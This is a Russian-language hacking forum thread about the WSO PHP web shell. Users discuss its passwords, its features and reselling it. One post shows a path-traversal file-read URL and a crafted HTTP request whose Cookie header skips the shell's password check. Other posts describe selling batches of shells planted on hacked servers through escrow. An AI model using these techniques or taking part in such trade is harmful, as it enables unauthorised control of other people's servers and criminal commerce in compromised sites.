WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. nullik

    nullik Member

    Joined:
    26 Feb 2010
    Messages:
    116
    Likes Received:
    44
    Reputations:
    1
  2. SsSsSr

    SsSsSr New Member

    Joined:
    11 Oct 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    1
    как менять права в папках через шел этот?
     
  3. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Разве пробелы в именах разрешены?

    2.6 нету есть 2.5.1
     
  4. null

    null New Member

    Joined:
    9 Jan 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Какой пароль стоит по умолчанию для входа или, где его ставить?
     
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Для получения пароля, отправь СМС на короткий номер 9535 с текстом, "WSO 2.5" в ответ получишь пароль
     
  6. m00c0w

    m00c0w Banned

    Joined:
    25 Dec 2011
    Messages:
    104
    Likes Received:
    14
    Reputations:
    5
    Открой исходник, там всё есть :)
    или задай сам, с нужными опциями
    http://kronus.me/cn/wso-builder/1.04/
     
    1 person likes this.
  7. alextrust

    alextrust Member

    Joined:
    29 Mar 2010
    Messages:
    134
    Likes Received:
    27
    Reputations:
    11
    root
     
  8. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    как его научить работать с suid файлами?
     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Используя вот это
     
    _________________________
  10. dean999

    dean999 New Member

    Joined:
    16 May 2012
    Messages:
    78
    Likes Received:
    1
    Reputations:
    0
    WSO 2.5 modif - выдает ошибку "Query did not return anything"
    что в строке PHP указать? я вроде указываю путь из php.ini - но все равно, если ввести 2 поля верхних то он показывает что есть рут, поле 3 ввожу, и все ошибка.
    Думаю что то связано с PHP Интерпретатором, wrapper.php в связке с wso_root.php, перестали работать, можете помочь?)
     
  11. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    напиши в личку,может помогу
     
  12. foxinvisible

    foxinvisible Banned

    Joined:
    14 Oct 2012
    Messages:
    48
    Likes Received:
    13
    Reputations:
    10
    А чего нет в 2.5 ? Зачем вообще обновление?
     
  13. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Не то, что бы это дикий пиздец, но если вдруг, вы забыли пароль к своему шеллу WSO, и у вас есть возможность прочитать исходник, можно увидеть вполне элементарную строчку:
    PHP:
    $auth_pass "5deeb7c8589e337d46a3b2f807af33fd"# md5(пароль)
    Но к сожалению если ваша память коротка, а cmd5 и подобные сервисы не в силах сбрутить пароль по типу "md5(FmST[3XjPW) = 5deeb7c8589e337d46a3b2f807af33fd", а текстовый документ с исходным паролем чудом не сохранился. Расстраиваться не нужно. Достаточно послать в запросе в заголовке Cookie md5 сумму хоста, и прочитанный хеш.
    К примеру, шелл тут: http://google.com/images/wso.php
    Возможность прочитать исходник тут: http://google.com/index.php?file=../images/wso.php
    Получаем:
    PHP:
    $auth_pass "5deeb7c8589e337d46a3b2f807af33fd"# md5(пароль)
    Посылаем запрос:
    Code:
    GET /images/wso.php HTTP/1.1
    Host: google.com
    Cookie: 1d5920f4b44b27a802bd77c4f0536f5a=5deeb7c8589e337d46a3b2f807af33fd
    
    Меняем пароль, на тот который в состоянии запомнить, и всё.

    Не знаю кому эта информация сможет пригодиться, но пусть полежит здесь.
     
    _________________________
    4 people like this.
  14. foxinvisible

    foxinvisible Banned

    Joined:
    14 Oct 2012
    Messages:
    48
    Likes Received:
    13
    Reputations:
    10
    У меня сделка через 4 часа..
    Человек оплачивает хххх$ с протекцией, потом получает пачку шеллов залитый, потом передаёт код, а потом я передаю пароль. Вот я и думаю теперь насколько вероятно для него будет не дать мне код протекции (человек сомнительный, если честно), а просто попытаться расшифровать хэш =)
     
  15. uCryNet

    uCryNet Member

    Joined:
    11 Mar 2012
    Messages:
    53
    Likes Received:
    13
    Reputations:
    5
    Что за фигня? При смене пароля на свой авторизоваться не хочет, ввожу правильно и уже не первый раз так
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Почистите кукисы.
     
    _________________________
    #336 BigBear, 8 Dec 2012
    Last edited: 12 Dec 2012
  17. po[w]er

    po[w]er Banned

    Joined:
    1 Oct 2012
    Messages:
    57
    Likes Received:
    0
    Reputations:
    0
    почистил анологично
     
  18. Светлый

    Светлый Elder - Старейшина

    Joined:
    28 Jun 2007
    Messages:
    159
    Likes Received:
    47
    Reputations:
    46
    было бы неплохо еще и хеш пароля проверить
     
  19. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    А че так и не добавили бекконнект с полноценным башем?

    https://rdot.org/forum/showthread.php?t=1386
     
  20. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    175
    Likes Received:
    8
    Reputations:
    1
    Есть возможность отследить действия через шелл или добавиться код чтоб в отдельный файл логировал все команды ,а то в последнее время частенько берут шеллы на проверку ,а потом мол "неподошел".